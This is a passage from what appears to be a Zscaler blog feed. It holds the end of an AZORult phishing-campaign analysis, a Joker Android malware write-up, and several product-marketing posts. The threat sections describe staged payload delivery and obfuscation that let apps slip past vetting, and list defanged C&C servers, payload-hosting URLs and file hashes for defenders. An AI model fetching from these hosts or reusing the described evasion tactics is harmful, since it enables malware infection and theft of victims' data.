can be found here. Network communication The final unpacked payload, AZORult, will perform information stealing activities on the machine and exfiltrate the information by sending an HTTP POST request to the URL: hxxp:// Upon inspection, we discovered that opendir was enabled on the C&C server as shown in Figure 13. Figure 13: Opendir enabled on the C&C server. The AZORult panel on the C&C server can be accessed at the URL: hxxp:// Figure 14: The AZORult panel PHP mailer script Among other artifacts we discovered on the C&C server, we found a PHP mailing script deployed at hxxp://crevisoft[.]net/images/-/leaf.php. This enables the threat actor to send emails using the C&C server’s SMTP. Figure 15: The PHP mailing script on the C&C server. Zscaler Cloud Sandbox detection Figure 16 shows the Zscaler Cloud Sandbox successfully detecting this .NET-based threat. Figure 16: Zscaler Cloud Sandbox detection. In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels, as seen here: Win32.PWS.Azorult Win64.PWS.Azorult PDF.Downloader.Azorult Conclusion This threat actor is targeting employees in the supply chain industries in Oil and Gas sector in the middle east region. As always, users should be cautious when receiving emails out of the blue, even if those emails appear to be related to something you are interested in, such as a legal tender for a project which might appear relevant. And always be wary of links embedded inside file formats such as PDF since these links could lead to download of malicious files on your system. The Zscaler ThreatLabZ team will continue to monitor this campaign, as well as others, to help keep our customers safe. MITRE ATT&CK TTP Mapping ID Tactic Technique T1566.001 Spearphishing Attachment Uses PDF attachments containing malicious URLs T1204.002 User Execution: Malicious File User opens pdf file. Click the URL link. Downloads ZIP file. Extracts zip file and executes the binary. T1140 Deobfuscate/Decode Files or Information Strings and other data are obfuscated in the payload. T1036.005 Masquerading: Match Legitimate Name or Location File names used related to projects directly linked to the Middle East. T1027.002 Obfuscated Files or Information: Software Packing Payloads are packed with a multilayer packer. T1497 Virtualization/Sandbox Evasion Uses Registry, WMI, UserName-based anti-VM techniques T1134.002 Access Token Manipulation: Create Process with Token One of AZORult capabilities T1555.003 Credentials from Password Stores: Credentials from Web Browsers One of AZORult capabilities T1140 Deobfuscate/Decode Files or Information One of AZORult capabilities T1573.001 Encrypted Channel: Symmetric Cryptography One of AZORult capabilities T1083 File and Directory Discovery One of AZORult capabilities T1070.004 Indicator Removal on Host: File Deletion One of AZORult capabilities T1105 Ingress Tool Transfer One of AZORult capabilities T1057 Process Discovery One of AZORult capabilities T1055.012 Process Injection: Process Hollowing One of AZORult capabilities T1012 Query Registry One of AZORult capabilities T1113 Screen Capture One of AZORult capabilities T1082 System Information Discovery One of AZORult capabilities T1016 System Network Configuration Discovery One of AZORult capabilities T1033 System Owner/User Discovery One of AZORult capabilities T1124 System Time Discovery One of AZORult capabilities T1552.001 Unsecured Credentials: Credentials In Files One of AZORult capabilities Indicators of compromise Scheduled task names Naming convention: “Updates\<random_string>” Updates\YJSlNpkH Updates\WWOsRUUn Updates\NcojkRtJmDPru XML file names Scheduled tasks are created using dropped XML files in %temp% directory with random names. C:\Users\user\AppData\Local\Temp\tmp9AA2.tmp C:\Users\user\AppData\Local\Temp\tmp23B7.tmp C:\Users\user\AppData\Local\Temp\tmp24CC.tmp Dropped filenames Files are dropped in the “AppData\Roaming” directory with the same name as a scheduled task. C:\Users\User\AppData\Roaming\YJSlNpkH.Exe C:\Users\User\AppData\Roaming\WWOsRUUn.Exe C:\Users\user\AppData\Roaming\NcojkRtJmDPru.exe File hashes PDF hashes Author: Donor1 e368837a6cc3f6ec5dfae9a71203f2e2 741f66311653f41f226cbc4591325ca4 fe928252d87b18cb0d0820eca3bf047a 8fe5f4c646fd1caa71cb772ed11ce2e5 d8e3637efba977b09faf30ca49d75005 c4380b4cd776bbe06528e70d5554ff63 34cae3ae03a2ef9bc4056ca72adb73fc 363030120a612974b1eb53cc438bafcb 2710cc01302c480cd7cd28251743faf0 1693f1186a3f1f683893b41b91990773 7a016c37fa50989e082b7f1ca2826f04 709895dd53d55eec5a556cf1544fc5b9 5d9ed128316cfa8ee62b91c75c28acd1 c2ac9c87780e20e609ba8c99d736bec1 269cfd5b77ddf5cb8c852c78c47c7c4c 653f85816361c108adc54a2a1fadadcf 6944f771f95a94e8c1839578523f5415 8e5c562186c39d7ec4b38976f9752297 3d019ede3100c29abea7a7d3f05c642b 67f178fd202aee0a0b70d153b867cb5e 39598369bfca26da8fc4d71be4165ab4 70a92fdba79eaca554ad6740230e7b9a 9db3d79403f09b3d216ee84e4ee28ed3 bafdeef536c4a4f4acef6bdea0986c0b 8d7785c8142c86eb2668a3e8f36c5520 653e737fd4433a7cfe16df3768f1c07e ebdcb07d3de1c8d426f1e73ef4eb10f4 d258ba34b48bd0013bfce3308576d644 a74c619fd61381a51734235c0539e827 6f1bd3cb6e104ed6607e148086b1e171 cf04d33371a72d37e6b0e1606c7cd9a2 ede5fa9b9af1aeb13a2f54da992e0c37 5321cd5b520d0d7c9100c7d66e8274e1 de521f9e4bc6e934bb911f4db4a92d36 36e5726399319691b6d38150eb778ea7 1c5cb47fd95373ade75d61c1ae366f8b b7b41d93709777780712f52a9acf7a26 62a05b00c7e7605f7b856c05c89ee748 b520f4f9d87940a55363161491e69306 40c1156d98c39ac08fd925d86775586d Author: Mr. Adeel f2319ddb303c2a5b31b05d8d77e08b4e 24e67f40ccb69edb88cc990099ef2ffe 54fc7650a8b5c1c8dc85e84732a6d2c7 9cf615982d69d25b1d0057617bd72a95 e9dfa14e4f6048b6f3d0201b2f3c62fe abab000b3162ed6001ed8a11024dd21c 5c857bf3cf52609ad072d6d74a4ed443 73ddf9f8fc3dc81671ea6c7600e68947 3510cbf8b097e42745cfb6782783af2b 694a6568b7572125305bdb4b24cebe98 7fa5028f2394dcea02d4fdf186b3761f 2260d015eacdc14e26be93fbc33c92aa d51d5e4c193617fa676154d1fe1d4802 912dbb9e0400987c122f73e0b11876c0 0f4cd9e8111d4eeda89dbe2ce08f6573 d03fb3e473bd95c314987a1b166a92ed 549a06cb43563dad994b86e8f105323a 80149a26ee10786d6f7deaf9fb840314 c7ced41f38b2d481d1910663a14fbec4 3ce6cc6dee4563eb752e55103cdb84d4 ZIP hashes 6d0241bc7d4a850f3067bc40124b3f52 cdfde809746759074bcd8ba54eb19ccd 40b5976eb7ddd1d372e34908f74ba0c4 93c8ed2915d8a3ff7285e0aa3106073e 2b719eeca275228fbead4c1d3016b8e4 Exe hashes 42aec0b84a21fa36fc26b8210c197483 02ae44011006e358a3b1ccbd85ba01f2 131772a1bb511f2010da66c9c7dca32f 7860c138e3b8f40bfb6efec08f4a4068 3bcbe4d2951987363257a0612a107101 328aa4addb7e475c3721e2ae93391446 84e7b5a60cd771173b75a775e0399bc7 3c83b0fe45e15a2fd65ed64a8e1f65e9 f626e64f57d3b8c840a72bbfbe9fb6ca fcf7a9b93cffddf0a242a8fc83845ee3 Unpacked file hashes 0988195ab961071b4aa2d7a8c8e6372d - Aphrodite Ae5f14478d5e06c1b2dc2685cbe992c1 - Jupiter 38360115294c49538ab15b5ec3037a77 - Azorult Unique PDF file names Author: Donor1 RFQ #88556524.pdf ADNOC RFQ 97571784 - Purchase - core store Mussafah - Tehnical and Commercial.pdf ALJABER-GROUP-RFQ-38982254237312018-848000071984-03-19-Rev-1.1.pdf Dalma Gas Development Project (Package B) -TENDER BULLETIN-01.pdf RFQ-VENDOR 3 YEARS SUPPLY CONTRACT (RENEWAL OF LTPA 62431092).pdf Author: Mr. Adeel RFQ-ALJ-HAMAD INTERNATIONAL AIRPORT EXPANSION, DOHA.pdf RFQ-HAMAD INTERNATIONAL AIRPORT EXPANSION, DOHA QATAR.pdf RFQ-HAMAD INTERNATIONAL AIRPORT EXPANSION, DOHA.pdf RFQ#ENQ34640-ALJ24.pdf AJC-QA HAMAD INTERNATIONAL AIRPORT EXPANSION, DOHA.pdf C&C servers hxxp://crevisoft[.]net/images/backgrounds/ob/index.php hxxp://nsseinc[.]com/lingo/index.php Email address ZIP hosted URLs: Author of PDF: Donor1 hxxps://we[.]tl/t-lBcWz3Rcbs hxxps://mega[.]nz/#!Ov41xapb!M-COPorpfcQ7j1G61afFVruLbDVwzNfujRIwERqlIQw hxxps://we[.]tl/t-P2Lt34YUcf hxxps://we[.]tl/t-7XwI9xNjQj hxxps://we[.]tl/t-AgAdhMTWIm hxxps://mega[.]nz/file/fkImWKab#zvyeMmsYgGiu-hK-FT0o4OBozg0r4gWPRUtAr6iRvwM hxxps://we[.]tl/t-utJr50o6uf hxxp://bit[.]ly/32qQFah hxxps://mega[.]nz/file/zsIB2aLK#pyTNpp8H4pZhpq0i7w0OB8itu3Rj_02n9BksARDrlzc hxxps://mega[.]nz/#!nrozSBoL!Pc5ApemPW46RC8b0kgiTIyuIa0MnQV9GDUPXGK8__LM hxxps://we[.]tl/t-TbbBN9VnEZ hxxps://mega[.]nz/#!KuRElKZT!5F_FfxkyPI7tvJ-mnL7LppAU5X5wA1XbpTM-z8DpVB8 hxxps://mega[.]nz/file/q55WVIKB#zm3CTH6XEv63mwacATKpo2AMe7yjFmp-KpQXUBkhZJ4 hxxp://bit[.]ly/3a3CwSX hxxps://we[.]tl/t-MFcMWYK7HL hxxps://mega[.]nz/#!Tmw0EK5Q!zSLa_Ell7Ti5sz-ca-plgqc4vZM7S813Hb9Yk5Jk81Y hxxps://we[.]tl/t-0NlciPHf5y hxxps://mega[.]nz/#!y6w1BAqS!DMfA221sRvIyqVqPNhsKMZEAtBNkjY_jLUWEmCpxMfo hxxps://mega[.]nz/#!j2JSwQYb!LaAP2L2WBKLU3DlR6BViQxZ4b8fsmt53Hl3RKHMfb4w hxxps://mega[.]nz/file/Ptp1CL6R#EvbG9Gh435cDmmXXyU1_l4dM3Bq9fP2B8VdjirGiK_c hxxps://we[.]tl/t-feLBFQVV1P hxxps://we[.]tl/t-ad5X6peqHj hxxps://www[.]dropbox[.]com/s/cym2723azwnb364/ADNOC%202020%20REQUEST%20FOR%20QUOTATION-REQUEST%20FOR%20TENDER%20CODE%2076384_pdf[.]zip?dl=0 hxxps://we[.]tl/t-uwwupT1WNc hxxps://mega[.]nz/#!K6xgGCYJ!1cJY91IlILLrGGrDVVrkbb7vNRKL9CAFD4tB9_jP8ts hxxps://mega[.]nz/#!yrBGmQBA!EhgekpU4VUafMvfJKlNVFej1KsgxYWv1mfzCKXejjEc hxxps://we[.]tl/t-ZcyzrvcBkP hxxps://mega[.]nz/file/GpB3VIyS#3-tKCJ8d-y782IN0570wHMMKQ244ttzBRpUmFXh6LZQ hxxps://mega[.]nz/#!OvJFjQaY!UBgEDtTE_Gn4B4vYrn-d7rYeO5CBMTxt83NyXQGWh0E hxxps://mega[.]nz/file/G5YmjCYJ#jvqrZX2ZLXn3SAI9nzf8w6mWtxTM4_fwx7VzHdqzfqM hxxps://mega[.]nz/#!zygWnKAS!5kp8IWNec2HK-YPK2gk-hmLa416PZLtr6VpbNZediSk hxxps://mega[.]nz/#!uu40wQxJ!HXlLJw7KDJgqnpwCzgrnBt9vu_W1-FZlSIvn0JU5rDw hxxps://mega[.]nz/#!66hWzACL!_6klTwfD-JaSkwjWrKRIBqX1ghXr-SZGk1Utc2-VJPc hxxps://www[.]aljaber-llc[.]com/projects/files/ALJABER-RFQ-38982254237312018-848000071984-04-23-Rev-1[.]1[.]zip hxxps://we[.]tl/t-cJa4jY9Egz hxxps://we[.]tl/t-Out44emJ9t hxxps://we[.]tl/t-QuCLQY3cTh hxxps://we[.]tl/t-nMKuKWbMlE hxxps://mega[.]nz/file/f1RTVa4A#2uGmQV64RKkNYZEECYXFKjGPS-nalF2ZshufSgqsA_k hxxps://we[.]tl/t-oAkwGNORsR hxxps://we[.]tl/t-cFvm5QQlyV hxxps://www[.]dropbox[.]com/s/5b0bti9r6xhf3pq/ADNOC%202020%20REQUIREMENT%20TENDER%20RFQ%2056774387_PDF[.]zip?dl=0 hxxps://we[.]tl/t-Didobux8kG hxxps://we[.]tl/t-FkBOHwy1ME hxxps://mega[.]nz/file/u7xRlS7T#I8L3NL_zi-JizZagSF-E1Gcj5I8ednV6YdqyWs5RnNo hxxps://we[.]tl/t-XsVO5hewBu Author of PDF: Mr. Adeel hxxps://we[.]tl/t-NwSigkLd2E hxxps://we[.]tl/t-wQB6ioE8dL hxxps://we[.]tl/t-u3NL7Wnplr hxxps://we[.]tl/t-zC6Wz4CpfZ hxxps://we[.]tl/t-5wQSJsFUlC hxxps://we[.]tl/t-egfvdBvESW hxxps://we[.]tl/t-2a9aq4LJSn hxxps://we[.]tl/t-4BnTk2Hwiv hxxps://we[.]tl/t-hSqtTJDi1f hxxps://we[.]tl/t-1VyVEAtzAf hxxps://we[.]tl/t-E1iDs5Bghr hxxps://we[.]tl/t-YlbV0AIU5b hxxps://we[.]tl/t-1yLti4IfaN hxxps://we[.]tl/t-dGN9sRTnch hxxps://we[.]tl/t-spOqYklJIQ hxxps://we[.]tl/t-cunxjPBouY hxxps://we[.]tl/t-39SvbwCY2E hxxps://we[.]tl/t-9RVc3dflK6 hxxps://we[.]tl/t-aBUVx3EMdx hxxps://we[.]tl/t-XdOjUbrcK8 hxxps://we[.]tl/t-MkUZugwABd hxxps://we[.]tl/t-ikxwkPtSBi hxxps://we[.]tl/t-1hWeuMe1h7 hxxps://we[.]tl/t-2L7ajlJSCG hxxps://we[.]tl/t-HZygDd5TUJ hxxps://we[.]tl/t-MtgNnMbTij Sudeep Singh Joker Playing Hide-and-Seek with Google Play Joker is one of the most prominent malware families that continually targets Android devices. Despite awareness of this particular malware, it keeps finding its way into Google’s official application market by employing changes in its code, execution methods, or payload-retrieving techniques. This spyware is designed to steal SMS messages, contact lists, and device information along with silently signing up the victim for premium wireless application protocol (WAP) services. Our Zscaler ThreatLabZ research team has been constantly monitoring the Joker malware. Recently, we have seen regular uploads of it onto the Google Play store. Once notified by us, the Google Android Security team took prompt action to remove the suspicious apps (listed below) from the Google Play store. This prompted us to evaluate how Joker is so successful at getting around the Google Play vetting process. We identified 17 different samples regularly uploaded to Google Play in September 2020. There were a total of around 120,000 downloads for the identified malicious apps. The following are the names of the infected apps we discovered on the Google Play store: All Good PDF Scanner Mint Leaf Message-Your Private Message Unique Keyboard - Fancy Fonts & Free Emoticons Tangram App Lock Direct Messenger Private SMS One Sentence Translator - Multifunctional Translator Style Photo Collage Meticulous Scanner Desire Translate Talent Photo Editor - Blur focus Care Message Part Message Paper Doc Scanner Blue Scanner Hummingbird PDF Converter - Photo to PDF Powerful Cleaner (As of this writing, all of these apps have been removed from the Google Play store.) In this blog, we will discuss the tactics used by the Joker malware author to bypass the Google Play vetting process. Scenario 1: Direct download In some of the Joker variants, we saw the final payload delivered via a direct URL received from the command and control (C&C) server. In this variant, the infected Google Play store app has the C&C address hidden in the code itself with string obfuscation. We observed the string “sticker” was used to break the C&C address to hide it from the simple grep or string search, as shown in Figure 1. Figure 1: The C&C address string obfuscation. Once installed, the infected app contacts the C&C server, which then responds with the URL of a final payload. This JSON file also has the information related to the class name that needs to be executed from the final payload to do all the malicious activities. Figure 2: The C&C JSON response. Upon receiving the JSON configuration from the C&C, the infected app downloads the payload from the received location and executes it. Figure 3: The final payload download. Scenario 2: One-stage download In some apps, we observed that for retrieving the final payload, the infected Google Play app uses a stager payload. Here the infected Google Play store app has the stager payload URL encoded in the code itself encrypted using Advanced Encryption Standard (AES). Upon infection, unlike scenario 1, it downloads the stager payload rather than a final payload, as seen in Figure 4 and Figure 5. We also saw two varieties of the stager payload—an Android Package (APK) or a Dalvik executable file. Figure 4: The Dalvik executable stager payload download. Figure 5: The APK stager payload download. The job of this stager payload is to simply retrieve the final payload URL from the code and download it. Along with the payload download, it is responsible for executing the final payload as well. In the stager payload, we also saw some different tactics used by the malware author to hide the final payload URL. We saw instances where the final payload is obfuscated with AES and, in some cases, we saw simple shift operation was used to obfuscate the final payload URL. In some cases, the final payload URL was also in plain text. Figure 6: AES encryption for the end payload URL. Figure 7: The plain text end payload URL. Figure 8: The plain text end payload URL. Figure 9: The obfuscated end payload URL with Shift encoding Upon execution, it downloads the final stage payload, which is the core Joker malware doing all the infection activities ranging from premium SMS subscription scam to spyware activities, as seen in Figure 10. Figure 10: The end payload download. Scenario 3 : Two-stage download In some groups of infected Google Play store apps, we saw two-stager payload downloads used to retrieve the final payload. Here, the Google Play infected app downloads the stage one payload, which downloads the stage two payload, which finally loads the end Joker payload. Interestingly, unlike previous two scenarios, the infected app contacts the C&C server for the stage one payload URL, which hides it in response location header. Figure 11: The C&C response for the stage one payload URL. Upon infecting the device, the infected app downloads the stage one payload from the received URL from the C&C in the response header. Like scenario two, the job of this payload is to simply download another payload but this time it won't be the final payload. Observe the below screenshot for the same activity. Figure 12: The stage two URL in stage one code. Upon execution of the stage one payload, it downloads the stage two payload. The stage two payload exhibits the same behavior as the stage one payload. It includes the hard-coded URL, which retrieves the final payload as shown in Figure 13. Figure 13: The final payload URL in the stage two code. Final payload details Although these variations were used by Joker to reach the end payload, we saw the same end payload downloaded in all the cases. Here are some highlights of the final payload activities. The final payload employs DES encryption to execute the C&C activities. Figure 14: The DES encryption for the C&C post request. Figure 15 shows the network patterns used by Joker to execute the C&C activities. Figure 15: The C&C pattern for the post request. The end payload also employs string obfuscation to hide all the important strings. It uses string “nus106ba” to break all the important strings to hide it from simple string search. Figure 16: The string obfuscation. Figure 17 shows the SMS harvesting and WAP fraud done by Joker. Figure 17: The WAP fraud. This post provides in-depth details related to end payload activities done by Joker. Recommandation We recommend paying close attention to the permission list in the apps that you install on your Android device. Always watch out for the risky permissions related to SMS, call logs, contacts, and more. Reading the comment or reviews on the app page aslo helps identify compromised apps. IOCs Infected Apps on GooglePlay: MD5s Package Name 2086f0d40e611c25357e8906ebb10cd1 b8dea8e30c9f8dc5d81a5c205ef6547b com.docscannercamscanpaper 5a5756e394d751fae29fada67d498db3 com.focusphoto.talent.editor 8dca20f649f4326fb4449e99f7823a85 com.language.translate.desire.voicetranlate 6c34f9d6264e4c3ec2ef846d0badc9bd com.nightsapp.translate.sentence 04b22ab4921d01199c9a578d723dc6d6 com.password.quickly.applock b488c44a30878b10f78d674fc98714b0 a6c412c2e266039f2d4a8096b7013f77 4c5461634ee23a4ca4884fc9f9ddb348 e4065f0f5e3a1be6a56140ed6ef73df7 pdf.converter.image.scanner.files bfd2708725bd22ca748140961b5bfa2a message.standardsms.partmessenger 164322de2c46d4244341e250a3d44165 88ed9afb4e532601729aab511c474e9a 27e01dd651cf6d3362e28b7628fe65a4 e7b8f388051a0172846d3b3f7a3abd64 prisms.texting.messenger.coolsms 0ab0eca13d1c17e045a649be27927864 bfbe04fd0dd4fa593bc3df65a831c1be URLs of payload distribution blackdragon[.]oss-ap-southeast-5[.]aliyuncs[.]com/privateSMS_ba[.]htm blackdragon03[.]oss-ap-southeast-5[.]aliyuncs[.]com/partMessage_base[.]css blackdragon03[.]oss-ap-southeast-5[.]aliyuncs[.]com/partMessage_config[.]json nineth03[.]oss-ap-southeast-5[.]aliyuncs[.]com/MeticulousScanner_bs[.]mp3 sahar[.]oss-us-east-1[.]aliyuncs[.]com/care[.]asf sahar[.]oss-us-east-1[.]aliyuncs[.]com/onesentence[.]asf sahar[.]oss-us-east-1[.]aliyuncs[.]com/onesentence2[.]asf sahar[.]oss-us-east-1[.]aliyuncs[.]com/saiks[.]asf sahar[.]oss-us-east-1[.]aliyuncs[.]com/tangram[.]asf sahar[.]oss-us-east-1[.]aliyuncs[.]com/tangram2[.]asf sahar[.]oss-us-east-1[.]aliyuncs[.]com/twinkle[.]asf 2j1i9uqw[.]oss-eu-central-1[.]aliyuncs[.]com/328718737/armeabi-v7a/ihuq[.]sky blackdragon[.]oss-ap-southeast-5[.]aliyuncs[.]com/blackdragon[.]html blackdragon[.]oss-ap-southeast-5[.]aliyuncs[.]com/privateSMS[.]json fgcxweasqw[.]oss-eu-central-1[.]aliyuncs[.]com/fdcxqewsswq/dir[.]png jk8681oy[.]oss-eu-central-1[.]aliyuncs[.]com/fsaxaweqwa/amly[.]art n47n[.]oss-ap-southeast-5[.]aliyuncs[.]com/H20PDF29[.]txt n47n[.]oss-ap-southeast-5[.]aliyuncs[.]com/font106[.]ttf nineth03[.]oss-ap-southeast-5[.]aliyuncs[.]com/blackdragon[.]html proxy48[.]oss-eu-central-1[.]aliyuncs[.]com/m94[.]dir proxy48[.]oss-eu-central-1[.]aliyuncs[.]com/response[.]js laodaoo[.]oss-ap-southeast-5.aliyuncs[.]com/allgood2[.]webp laodaoo[.]oss-ap-southeast-5[.]aliyuncs[.]com/flower[.]webp rinimae[.]oss-ap-southeast-5[.][.]mov rinimae[.]oss-ap-southeast-5[.][.]mov rinimae[.]oss-ap-southeast-5[.][.]mov Final C&C: 161[.]117[.]229[.]58 161[.]117[.]83[.]26 47[.]74[.]179[.]177 References: Viral Gandhi Rethinking Security for Today’s Workforce with Zscaler Internet Access In light of COVID-19, more employees are working remotely than ever before. While work-from-anywhere is beneficial from a health and safety standpoint, it has required IT departments to adapt their infrastructures to be more resilient to keep business moving forward with minimal disruption while preparing for new, evolving risks and future uncertainties. For instance, as the volume of remote users grows, VPN instability increases, which drives users to shift business off-network, connecting directly to cloud apps, away from security controls. Additionally, there are now many threats explicitly targeting people working remotely, including quite a few that are leveraging COVID-related lures to deliver malware. For IT leaders, tackling these emerging challenges requires a new, flexible approach to protecting remote employees and their data. With Zscaler Internet Access (ZIA), including Cloud Firewall, Cloud Sandbox, and Cloud DLP, businesses can completely secure their employees no matter their location or device, enabling fast, direct-to-internet connections while protecting against breaches and data exfiltration—all at a fraction of the cost of traditional approaches. Let’s take a closer look at how these solutions combine to give your users the freedom to work anywhere, securely. Secure all connections with Zscaler Client Connector Zscaler Client Connector is the cornerstone of fast, secure connections regardless of user location. Before the user’s device connects to the internet, Zscaler Client Connector establishes a secure connection to the Zscaler cloud. By leveraging Z-tunnel 2.0, all traffic, ports, and protocols are proxied through Zscaler for inspection, which results in fast, secure direct-to-application experiences for users without the need for a performance-hindering VPN. Identical protection on- and off-network with Advanced Cloud Firewall When people work remotely, they use different applications and exhibit different browsing behavior and internet activity than they would on-network. Because traditional firewalls do not protect off-network users, the chance of getting infected with malware increases significantly. In today’s work-from-anywhere environment, it’s critical for organizations to address these differences in user behavior and have the ability to easily scale their corporate policies to off-network connections, like blocking BitTorrent and remote desktop protocol (RDP)-based apps, like Teamviewer, regardless of port or protocol, user device or location, evasion tactics, or SSL encryption. With Zscaler Advanced Cloud Firewall and Z-tunnel 2.0, you can apply identical protection with a single, consistent policy, wherever your users connect. Always-on advanced threat protection with Cloud Sandbox Users are most vulnerable to ransomware and other attacks when off-network and away from a secure gateway. To protect these off-network users, Zscaler Cloud Sandbox is a must for uncovering and preventing the delivery of advanced targeted attacks. With Zscaler's Advanced Cloud Sandbox, the delivery of unknown files can be halted until confirmed clean, reducing the likelihood of patient-zero attacks, which are becoming more popular with attackers looking for backdoors into a corporate network. Additionally, complete SSL inspection enables you to inspect every byte of traffic—allowing you to uncover hidden threats before they can reach your users. Cloud DLP prevents data exfiltration—everywhere Data loss, intentional or unintentional, can create a nightmare for security and compliance teams—especially if the data exfiltrated is confidential or sensitive. Zscaler Cloud DLP prevents this from happening while eliminating blind spots by leveraging native SSL inspection capabilities. Also, Zscaler Exact Data Match technology aids compliance by automatically identifying personal information to keep it airtight from exposure and exfiltration. All of this combines to not only strengthen your security posture but also to meet today's stringent compliance standards. With Zscaler Internet Access, Cloud Firewall, Cloud Sandbox, and Cloud DLP, not only will your business be well-equipped to secure employees, wherever they’re connecting, but you will also have the infrastructure in place to scale work-from-anywhere. Furthermore, this improvement in security posture can be achieved without negatively affecting user experiences, and without the cost of adding and managing more hardware as capacity needs grow. Zscaler has already helped thousands of customers embrace the new work-from-anywhere reality by enabling them to stay resilient while keeping their employees productive and, more importantly, safe. Learn more about how Zscaler Internet Access supports your work-from-anywhere efforts. Jen Toscano is a Sr. Product Marketing Manager at Zscaler Jen Toscano Identity-Based Microsegmentation is Foundational to Cloud Security: Don’t Get Spoofed. Identity-based microsegmentation has rapidly become accepted as a best practice for cloud security and enabling zero trust. In Gartner’s April 2020 report, Market Guide for Cloud Workload Protection Platforms (Gartner subscription required), analysts Neil MacDonald and Tom Croll write: “Some vendors focus exclusively on microsegmentation. In all cases, the solution should support the growing requirement for identity-based “microsegmentation” (more granular, software-defined segmentation also referred to as zero trust network segmentation) of east/west traffic in data centers.” Additionally, identity-based segmentation and network visibility is identified as a foundational control on Gartner’s Risk-Based Hierarchy of Workload Protection Controls. When platforms claim to build zero trust policies using identity, it is critical to ensure they are not just slapping a label on firewall-based policies, which carry all the same security risks as a legacy solution that builds policies based on network addresses. Identity-based microsegmentation vs. legacy methods Identity is the key to effective zero trust policies. Most microsegmentation and zero trust solutions are based on firewalls, which rely on network addresses. That’s a problematic approach for many reasons. First, networks change constantly, which means policies tied to the network need to be continually updated as applications and devices move. That’s difficult enough to do in a data center, but it’s effectively impossible in the cloud and other autoscaling environments where IP addresses are ephemeral. The even bigger problem with using network address-based approaches for segmentation is that these tools cannot identify *what* is communicating (i.e., the identity of the software that is communicating); they can only tell you *how* it is communicating (e.g., from what IP address, port, or protocol). It’s as if the FBI intercepted a conversation between two suspected spies, and as soon as they verify that their suspects are speaking in English (i.e., protocol) over a domestic cellular network (e.g., the devices), the agents assume that these communications are completely innocent without at all considering the identities of the spies. That’s almost exactly what network-based security systems do. They only look at the protocol and the network address. So long as they are deemed “safe,” communications are allowed, even though IT has no idea exactly what is trying to communicate. Another benefit to an identity-based approach is that it greatly simplifies policy management for microsegmentation—you can protect a segment with as few as seven identity-based policies vs. hundreds of address-based rules. To illustrate, let’s take a typical environment with 15 billion network events. If we “uniquify” these and eliminate redundant events, that number will drop down to one to two million unique network events. But we can go further—let’s de-duplicate those one to two million events based on similar apps (i.e., using identity) with similar interactions. Now we drop down to 267,000, but we’re not done. Let’s use machine learning (ML) to reduce it further via similarity scoring. That brings us to 40,000 unique interactions, which can be codified into fewer than 100 identity-based policies for the entire environment vs. tens of thousands of address-based rules. When you look at interactions on a network, you’ll see a lot of randomness—this address to that address over this port—which appears to be a massive, unwieldy, and complicated mess of interactions. You could never achieve a microsegmentation outcome just by looking at it. But by using ML and identity, IT can compress it all down to a very small set of manageable policies. Using identity makes microsegmentation a solvable problem. How Zscaler implements identity-based zero trust Zscaler Workload Segmentation begins by mapping the application communication topology using ML, a process that takes about 72 hours (a huge improvement over the months it takes to perform manually). Once complete, we can measure the total network paths available and the application paths that are actually required by the business applications. Typically, only a fraction of pathways is required. We can eliminate all unnecessary communications paths to reduce the attack surface—typically, our ML algorithm can shrink the number of paths by about 90 percent, while ensuring full coverage of the environment. To enable identity-based microsegmentation, each device and software asset is assigned an immutable, unique identity based on dozens of properties of the asset itself, such as a SHA-256 hash of a binary or the UUID of the BIOS. Identities extend down to the subprocess level, so we can uniquely identify even individual Java JAR and Python scripts. Identity creation and management is fully automated to simplify operations. Zscaler verifies the identities of communicating software in real time. This zero trust approach prevents unapproved and malicious software from communicating. Piggybacking attacks using approved firewall rules become a thing of the past. Identity is the secret to achieving simpler operations and delivering stronger protection compared to traditional network security controls. Because the identities of communicating software are so specific, Zscaler simplifies the number of policies required to protect a segment. As noted above, our platform builds no more than seven policies for each segment that establish exactly which applications and devices can communicate with one another. And because segmentation policies are built using software identity, even if the underlying network changes, policies don’t break. If the system can’t verify the unique identity of what’s trying to communicate, no communication occurs. With Zscaler Workload Segmentation, creating segments and the associated policies takes just seconds with a single click. Peter Smith is the Zscaler VP of Secure Workload Communication Nagraj Seshadri Changing the Mindset: From Cost Center to Business Enabler Robert Berkenpas is the Group Manager Infrastructure & Operations at MOWI. His post originally appeared on LinkedIn and you can view a short video about MOWIs work-from-anywhere journey here. It is not unusual that innovation happens when we are faced with a crisis. Dealing with a shortage of resources, lacking time, being faced with an economic downturn or a global health crisis, our plans and budgets which have been thoroughly calculated, debated, and negotiated, all a sudden are no longer the rule book by which we play. Unusual times cause us to be quick on our feet, rethink, pivot, and make changes that had been unimaginable before. Just six months ago, had you told me that MOWI’s offices and production facilities, like the Brugge production plant for example, were going to look like ghost towns, only with essential personnel on the floor that handle and filet freshly caught salmon from Norway (even ramping up production volume) with the factory actually being run from our employees’ homes, I would have called you crazy. Here we are, half a year into the worst pandemic of my life-time that has affected millions of people around the world and brought so many businesses around the globe to a standstill. Being one of the largest seafood producers in the world, MOWI has an obligation to care for our employees and the fish we raise and to secure the supply of food for people all around the world. While it has been a difficult time, I want to highlight a positive development that I have been very lucky to observe over the past few months: IT being recognized as a business enabler rather than a cost center. Earlier this year, when it became evident that COVID-19 was spreading globally and social distancing was going to be essential, my team stepped up and rolled out technology that would enable us to work anywhere and keep our employees, their loved ones, and all our colleagues safe. When people had started working from home it became evident that our incumbent VPN was not able to handle the sheer amount of users and data. We had already completed a proof-of-value of Zscaler Private Access (ZPA) which enabled us to fast-track the rollout to all staff in less than a month and proved to us that we had been on the right path when we evaluated ZPA. We deployed the solution remotely and got a few confused looks when we told people to just turn off their VPNs and continue working. Over the next weeks my team received many compliments on the ease of use - no more generating codes and entering pins as you fire up your VPN, just turning on your laptop and starting to work. The success we have had with Zscaler didn’t go unnoticed across all areas of the business. This has been one of those rare occasions in my career where we have been able to change the trajectory of our department, even for our business, through this very important technology decision that we made. My team proved that IT is there to support the business, not to put unnecessary obstacles in their way as it was often perceived in the past and as a bonus increase security. We probably pulled off the fastest IT project in the history of the company and demonstrated to our colleagues across the board that we have a vision on how to leverage technology to enable business outcomes. This recognition has already manifested itself in our team being invited to meetings and discussions that we were previously not included in, or being brought to the table at an early stage where our expertise can actually propel projects forward. The mindset has changed and the company is more aware than ever about the value IT brings and how they can leverage our expertise to drive positive business outcomes, not just solve technical problems. We are learning a lot with new technologies, like using AI to improve feed patterns for our fish, or leveraging cloud technology to become a mobile workforce. And this is just the beginning. When we as a business leverage technology to optimize or create new processes, we ensure that our company keeps innovating and supports a sustainable future. I am a firm believer that technology and innovation will create 